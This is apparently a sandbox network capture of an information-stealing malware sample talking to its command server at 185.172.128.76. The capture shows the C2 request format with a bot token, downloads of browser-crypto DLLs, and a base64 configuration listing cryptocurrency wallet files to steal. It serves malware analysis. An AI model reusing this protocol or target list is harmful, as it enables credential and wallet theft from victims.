                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file"------FCAFIJJJKEGIECAKKEHI--
                                                                                                                                                                                                                            Apr 26, 2024 23:09:06.526704073 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:06 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:08.069814920 CEST560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCG
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 359
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: ------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="file"------HIDGCFBFBFBKEBGCAFCG--
                                                                                                                                                                                                                            Apr 26, 2024 23:09:08.448174953 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:08 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:08.675903082 CEST93OUTGET /15f649199f40275b/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:09.026814938 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:08 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 685392
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                            ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B [TRUNCATED]
                                                                                                                                                                                                                            Apr 26, 2024 23:09:11.467519999 CEST93OUTGET /15f649199f40275b/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:11.819706917 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:11 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 608080
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                            ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B [TRUNCATED]
                                                                                                                                                                                                                            Apr 26, 2024 23:09:12.615345001 CEST94OUTGET /15f649199f40275b/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:12.961487055 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:12 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 450024
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                            ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B [TRUNCATED]
                                                                                                                                                                                                                            Apr 26, 2024 23:09:13.395142078 CEST90OUTGET /15f649199f40275b/nss3.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:13.747328043 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:13 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 2046288
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                            ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                            Apr 26, 2024 23:09:16.647753954 CEST94OUTGET /15f649199f40275b/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:16.995138884 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:16 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 257872
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                            ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B [TRUNCATED]
                                                                                                                                                                                                                            Apr 26, 2024 23:09:17.564908981 CEST98OUTGET /15f649199f40275b/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:17.911365032 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:17 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 80880
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                            ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B [TRUNCATED]
                                                                                                                                                                                                                            Apr 26, 2024 23:09:18.680177927 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KKECBFCGIEGCBGCAECGC
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1067
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 26, 2024 23:09:19.057451963 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:18 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 26, 2024 23:09:19.136437893 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 267
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="message"wallets------AAEGHJKJKKJDHIDHJKJD--
                                                                                                                                                                                                                            Apr 26, 2024 23:09:19.489017010 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Fri, 26 Apr 2024 21:09:19 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 2408
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11 [TRUNCATED]
                                                                                                                                                                                                                            Apr 26, 2024 23:09:20.806113005 CEST466OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 265
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
